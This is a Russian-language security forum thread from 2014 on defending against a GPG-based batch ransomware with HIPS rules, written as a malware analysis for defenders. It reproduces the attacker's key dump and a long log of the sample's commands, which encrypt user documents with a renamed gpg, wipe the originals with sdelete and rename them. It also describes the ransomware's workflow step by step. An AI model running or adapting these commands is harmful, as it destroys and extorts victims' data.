Защита от вирусных шифровщиков с помощью HIPS

Сообщений: 17841

Баллов: 14272

Регистрация: 16.03.2010

Размещено 02.10.2014 16:14:13

1.

Цитата
На Касперском пострадавший выложил шифровальщика, куда скинуть?

только в личные сообщения.

2.

Цитата
C:\Windows\System32\wscript.exe

это приложение блокировать нельзя, поскольку оно будет обрабатывать и легальные js

[ Как создать образ автозапуска? ]

Сообщений: 17841

Баллов: 14272

Регистрация: 16.03.2010

Размещено 02.10.2014 20:17:54

в текущем варианте бат энкодера (от 01.10.2014) используется данный ключ для шифрования secring.gpg
keybtc (keybtc) <[email protected]>
0xAAB62875
отпечаток: EC80 5D63 134E B513 86FB B2DB 852C 16FC AAB6 2875
подключ: 0xA3CE7DBE

Цитата
:public key packet: version 4, algo 1, created 1407221140, expires 0 pkey[0]: [2048 bits] pkey[1]: [17 bits] keyid: 852C16FCAAB62875 :user ID packet: "keybtc (keybtc) <[email protected]>" :signature packet: algo 1, keyid 852C16FCAAB62875 version 4, created 1407221140, md5len 0, sigclass 0x13 digest algo 2, begin of digest 97 2e hashed subpkt 2 len 4 (sig created 2014-08-05) hashed subpkt 27 len 1 (key flags: 03) hashed subpkt 11 len 5 (pref-sym-algos: 9 8 7 3 2) hashed subpkt 21 len 5 (pref-hash-algos: 8 2 9 10 11) hashed subpkt 22 len 3 (pref-zip-algos: 2 3 1) hashed subpkt 30 len 1 (features: 01) hashed subpkt 23 len 1 (key server preferences: 80) subpkt 16 len 8 (issuer key ID 852C16FCAAB62875) data: [2048 bits] :public sub key packet: version 4, algo 1, created 1407221140, expires 0 pkey[0]: [2048 bits] pkey[1]: [17 bits] keyid: F2075C4EA3CE7DBE :signature packet: algo 1, keyid 852C16FCAAB62875 version 4, created 1407221140, md5len 0, sigclass 0x18 digest algo 2, begin of digest 0a 77 hashed subpkt 2 len 4 (sig created 2014-08-05) hashed subpkt 27 len 1 (key flags: 0C) subpkt 16 len 8 (issuer key ID 852C16FCAAB62875) data: [2045 bits] File: C:\Documents and Settings\safety\Local Settings\Temp\impubkey.keybtc

Цитата

:public key packet:
version 4, algo 1, created 1407221140, expires 0
pkey[0]: [2048 bits]
pkey[1]: [17 bits]
keyid: 852C16FCAAB62875
:user ID packet: "keybtc (keybtc) <[email protected]>"
:signature packet: algo 1, keyid 852C16FCAAB62875
version 4, created 1407221140, md5len 0, sigclass 0x13
digest algo 2, begin of digest 97 2e
hashed subpkt 2 len 4 (sig created 2014-08-05)
hashed subpkt 27 len 1 (key flags: 03)
hashed subpkt 11 len 5 (pref-sym-algos: 9 8 7 3 2)
hashed subpkt 21 len 5 (pref-hash-algos: 8 2 9 10 11)
hashed subpkt 22 len 3 (pref-zip-algos: 2 3 1)
hashed subpkt 30 len 1 (features: 01)
hashed subpkt 23 len 1 (key server preferences: 80)
subpkt 16 len 8 (issuer key ID 852C16FCAAB62875)
data: [2048 bits]
:public sub key packet:
version 4, algo 1, created 1407221140, expires 0
pkey[0]: [2048 bits]
pkey[1]: [17 bits]
keyid: F2075C4EA3CE7DBE
:signature packet: algo 1, keyid 852C16FCAAB62875
version 4, created 1407221140, md5len 0, sigclass 0x18
digest algo 2, begin of digest 0a 77
hashed subpkt 2 len 4 (sig created 2014-08-05)
hashed subpkt 27 len 1 (key flags: 0C)
subpkt 16 len 8 (issuer key ID 852C16FCAAB62875)
data: [2045 bits]

File: C:\Documents and Settings\safety\Local Settings\Temp\impubkey.keybtc

правило защиты %temp%\pubring.gpg работает.

http://chklst.ru/forum/discussion/532/bat-encoder

[ Как создать образ автозапуска? ]

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 03.10.2014 02:58:11

Если запрещаем конечный файл: C:\DOCUME~1\\LOCALS~1\Temp\sdelete.exe (утилита безвозвратного удаления файлов)
Файлы шифруются но оригиналы не удаляются, и папка C:\Documents and Settings\%USERNAME%\Application Data\gnupg остается полной.

Сообщений: 17841

Баллов: 14272

Регистрация: 16.03.2010

Размещено 03.10.2014 05:33:38

будут переименовывать sdelete всякий раз.

Изменено: santy - 03.10.2014 07:19:55

[ Как создать образ автозапуска? ]

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 03.10.2014 06:23:15

Вот само зло наверно:

C:\Documents and Settings\%USERNAME%\Local Settings\Temp\j13544q130b.js (рандомный, скачивает с интернета исходники вируса, через прокси тунель)
C:\Documents and Settings\%USERNAME%\Local Settings\Temp\keyb.cmd
C:\Documents and Settings\%USERNAME%\Local Settings\Temp\bitdata.cmd

Скрытый текст
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" "‚®¤плҐ «Ё«ЁЁ[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" "ѓ®«гЎлҐ е®«¬л[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" "‡ Є в[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" "‡Ё¬ [email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" & move /y "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip.gpg" "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" & rename "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" "‘Є -Є®ЇЁЁ бзҐв®ў[email protected]_com"

Скрытый текст

svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" "[email protected]_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" "[email protected]_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" "[email protected]_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" "[email protected]_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" "[email protected]_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" "[email protected]_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" "[email protected]_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" "[email protected]_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" "‚®¤плҐ «Ё«ЁЁ[email protected]_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" "ѓ®«гЎлҐ е®«¬л[email protected]_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" "‡ Є в[email protected]_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" "‡Ё¬ [email protected]_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" & move /y "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip.gpg" "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" & rename "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" "‘Є -Є®ЇЁЁ бзҐв®ў[email protected]_com"

Изменено: Виктор - 03.10.2014 07:32:49

Сообщений: 17841

Баллов: 14272

Регистрация: 16.03.2010

Размещено 03.10.2014 06:54:55

зла как такого здесь нет. просто идет пофайловое шифрование документов пользователя.

в последнем варианте от 01_10_2014 используется keyb.cmd.
в ранних вариантах были keybtc.bat, paybtc.bat, clicrypt.bat

отличаются они друг от друга мало чем. вначале переименованы файлы, которые скачаны из сети в исполняемые.
затем формируется публик ключ, которым будет шифроваться secring.gpg из ключевой пары, созданной на стороне юзеры,
после того как создана пара, secring.gpg шифруется этим ключом, и его остатки затираются с помощью sdelete.exe
затем идет шифрование документов пользователя по всем обнаруженным дискам.

после завершения шифрования формируется почтовое сообщение, которое будет отправлена по найденным адресным книгам

в завершении все зачищается, остаются KEY.PRIVATE в котором хранится secring.gpg и UNIQUE.PRIVATE в котором зашифрован список документов пользователя, которые были зашифрованы энкодером.

Изменено: santy - 03.10.2014 07:09:08

[ Как создать образ автозапуска? ]

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 03.10.2014 07:00:20

Кстати как Вы ключ secring.gpg целым оставили?
У меня он всегда 0 Кб

Изменено: Виктор - 03.10.2014 07:00:40

Сообщений: 17841

Баллов: 14272

Регистрация: 16.03.2010

Размещено 03.10.2014 07:05:53

Цитата
Виктор пишет: Кстати как Вы ключ secring.gpg целым оставили? У меня он всегда 0 Кб

а где у меня secring.gpg? того что очень нужен, нету.

. остается secring.gpg.gpg, который потом переименуется в KEY.PRIVATE.
а так я здесь описал способ защиты.
http://chklst.ru/forum/discussion/532/bat-encoder#Item_1

Изменено: santy - 03.10.2014 07:09:27

[ Как создать образ автозапуска? ]

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 03.10.2014 07:11:05

Не дочитал выше пост:D
А про ключ я там вычитал:

результат:
файлы зашифрованы, но ключик то секретный у нас хранится на связке ключей:)

Сообщений: 17841

Баллов: 14272

Регистрация: 16.03.2010

Размещено 03.10.2014 07:15:30

все просто. скачиваем пару:
http://chklst.ru/forum/docs/key/keygpg.rar
извлекаем ключи. pubring.gpg добавляем в %temp% юзера и защищаем в HIPS от перезаписи и удаления. secring.gpg хранится у нас.

Изменено: santy - 03.10.2014 07:16:10

[ Как создать образ автозапуска? ]

Ответы